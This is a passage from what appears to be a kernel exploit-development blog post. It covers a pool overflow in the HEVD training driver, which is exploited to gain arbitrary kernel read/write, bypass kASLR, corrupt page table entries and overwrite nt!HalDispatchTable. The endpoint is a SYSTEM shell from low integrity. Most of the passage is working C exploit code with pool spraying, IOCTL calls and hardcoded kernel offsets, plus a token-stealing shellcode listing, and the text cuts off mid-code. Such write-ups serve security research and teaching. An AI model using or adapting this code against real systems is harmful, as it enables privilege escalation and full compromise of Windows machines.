Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a “Set” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference this address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the “Get” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually “trick” the program to overwrite the Name member of the corrupted object, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the “Get” functionality on the main object later.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
